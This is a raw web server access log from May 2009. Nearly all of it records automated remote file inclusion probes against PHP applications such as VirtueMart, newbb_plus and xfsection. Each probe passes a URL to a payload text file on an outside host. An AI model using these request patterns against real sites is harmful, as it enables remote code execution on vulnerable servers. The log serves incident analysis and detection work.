85.17.162.28 - - [28/May/2009:14:16:46 -0500] "GET /logs/access_log.1241136000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:09 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:11 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:13 -0500] "GET /logs/access_log.1241136000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:18 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:20 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:17:22 -0500] "GET /logs/access_log.1241136000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:19:00 -0500] "GET /logs/access_log.1240272000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:19:08 -0500] "GET /logs/access_log.1240272000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:14:19:35 -0500] "GET /logs/access_log.1240272000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:20:13 -0500] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:14:20:14 -0500] "GET ///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:14:20:14 -0500] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:14:20:14 -0500] "GET ///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
218.104.188.3 - - [28/May/2009:14:21:42 -0500] "GET //contrib/yabbse/poc.php?sourcedir=http://www.nvc-korat.ac.th/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
218.104.188.3 - - [28/May/2009:14:21:43 -0500] "GET /logs//contrib/yabbse/poc.php?sourcedir=http://www.nvc-korat.ac.th/appserv/AUTHORS.txt%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
195.34.78.110 - - [28/May/2009:14:22:34 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:22:34 -0500] "GET /logs/access_log.1241481600/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:22:35 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:22:37 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:22:37 -0500] "GET /logs/access_log.1241481600/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:22:38 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
118.98.212.6 - - [28/May/2009:14:23:02 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
118.98.212.6 - - [28/May/2009:14:23:03 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
203.130.231.111 - - [28/May/2009:14:23:25 -0500] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
203.130.231.111 - - [28/May/2009:14:23:26 -0500] "GET ///administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.130.231.111 - - [28/May/2009:14:29:19 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.130.231.111 - - [28/May/2009:14:29:21 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
203.130.231.111 - - [28/May/2009:14:29:35 -0500] "GET /logs/access_log.1241481600/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:34 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:35 -0500] "GET /logs/access_log.1239408000/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:36 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:49 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:49 -0500] "GET /logs/access_log.1239408000/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:31:50 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
203.130.231.111 - - [28/May/2009:14:32:14 -0500] "GET /?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.130.231.111 - - [28/May/2009:14:32:14 -0500] "GET /logs/access_log.1241481600/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:32:15 -0500] "GET /logs/access_log.1241654400/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.130.231.111 - - [28/May/2009:14:32:16 -0500] "GET /logs/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:32:23 -0500] "GET /logs/access_log.1242086400/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:14:32:38 -0500] "GET /logs/access_log.1241654400/?include_REQUEST=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.188.218.248 - - [28/May/2009:14:38:46 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:14:38:47 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
210.188.218.41 - - [28/May/2009:14:38:47 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
210.188.218.248 - - [28/May/2009:14:38:47 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
207.213.245.215 - - [28/May/2009:14:40:28 -0500] "GET /modules/xfsection/modify.php?dir_module=http://208.98.22.241/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:14:40:28 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://208.98.22.241/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
209.216.213.145 - - [28/May/2009:14:41:19 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.xsports.si//1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:41:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.xsports.si//1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:41:20 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.xsports.si//1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:41:20 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.xsports.si//1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:14:42:46 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://208.98.22.241/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:14:42:52 -0500] "GET //modules/xfsection/modify.php?dir_module=http://208.98.22.241/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:14:43:33 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:14:43:34 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
113.29.225.7 - - [28/May/2009:14:43:34 -0500] "GET /modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:43:34 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:43:34 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:44:19 -0500] "GET /logs/access_log.1240444800/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:44:53 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:44:53 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:44:53 -0500] "GET /modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:14:45:22 -0500] "GET /logs/access_log.1240444800/modules/xfsection/modify.php?dir_module=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:14:52:14 -0500] "GET /environment.php?DIR_PREFIX=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.50.197.106 - - [28/May/2009:14:52:17 -0500] "GET /logs/errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
72.52.235.39 - - [28/May/2009:14:52:18 -0500] "GET /logs/environment.php?DIR_PREFIX=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:14:52:18 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.50.197.106 - - [28/May/2009:14:52:18 -0500] "GET /errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.52.235.39 - - [28/May/2009:14:52:18 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:14:52:51 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:14:52:51 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:14:52:51 -0500] "GET //config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.103.111.2 - - [28/May/2009:14:52:54 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:53:44 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:53:44 -0500] "GET /modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:53:44 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:53:56 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:53:59 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:53:59 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:54:41 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:54:41 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
112.175.141.41 - - [28/May/2009:14:54:44 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:55:12 -0500] "GET /modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:55:12 -0500] "GET /logs/access_log.1235433600/modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:55:12 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:14:55:12 -0500] "GET /logs/access_log.1240617600/modules/xfsection/modify.php?dir_module=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:55:25 -0500] "GET /environment.php?DIR_PREFIX=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:55:25 -0500] "GET /logs/environment.php?DIR_PREFIX=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:14:55:25 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:03:20 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:03:20 -0500] "GET /logs/access_log.1233705600//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:03:23 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:03:30 -0500] "GET /logs/access_log.1235001600//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.55.117.34 - - [28/May/2009:15:05:54 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
74.55.117.34 - - [28/May/2009:15:05:54 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
74.55.117.34 - - [28/May/2009:15:06:08 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
74.55.117.34 - - [28/May/2009:15:06:09 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
66.249.65.36 - - [28/May/2009:15:06:49 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [28/May/2009:15:13:42 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:13:42 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:13:42 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:13:42 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
203.130.231.111 - - [28/May/2009:15:14:05 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
203.130.231.111 - - [28/May/2009:15:14:05 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
66.223.51.15 - - [28/May/2009:15:15:56 -0500] "GET /logs/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.223.51.15 - - [28/May/2009:15:15:56 -0500] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
66.223.51.15 - - [28/May/2009:15:15:56 -0500] "GET /logs/access_log.1242259200/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.223.51.15 - - [28/May/2009:15:16:19 -0500] "GET /logs/access_log.1241654400/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:39 -0500] "GET /logs/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:39 -0500] "GET /intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:39 -0500] "GET /logs/access_log.1231977600/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:39 -0500] "GET /logs/access_log.1242259200/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:50 -0500] "GET /intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:50 -0500] "GET /logs/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:50 -0500] "GET /logs/access_log.1242259200/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:15:18:50 -0500] "GET /logs/access_log.1231977600/intro.php//?_SERVER[DOCUMENT_ROOT]=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.17.129.100 - - [28/May/2009:15:19:05 -0500] "GET /includes/class_item.php?fileExtension=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
84.17.129.100 - - [28/May/2009:15:19:05 -0500] "GET /logs/includes/class_item.php?fileExtension=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.17.129.100 - - [28/May/2009:15:19:05 -0500] "GET /logs/access_log.1233273600/includes/class_item.php?fileExtension=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.17.129.100 - - [28/May/2009:15:19:16 -0500] "GET /logs/access_log.1236124800/includes/class_item.php?fileExtension=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:15:23:30 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:23:30 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:23:31 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:15:23:31 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
203.130.231.111 - - [28/May/2009:15:25:16 -0500] "GET /logs////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
203.130.231.111 - - [28/May/2009:15:25:16 -0500] "GET ////administrator/components/com_virtuemart/errors.php?error=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
91.149.157.130 - - [28/May/2009:15:25:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.149.157.130 - - [28/May/2009:15:25:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
88.183.32.67 - - [28/May/2009:15:28:47 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:28:51 -0500] "GET /logs/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:28:52 -0500] "GET /?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:29:19 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:37:18 -0500] "GET /?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:37:18 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:37:18 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:15:37:22 -0500] "GET /logs/?sourcedir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
86.122.170.50 - - [28/May/2009:15:49:05 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
86.122.170.50 - - [28/May/2009:15:49:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.1-zigzag.ru/id3.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
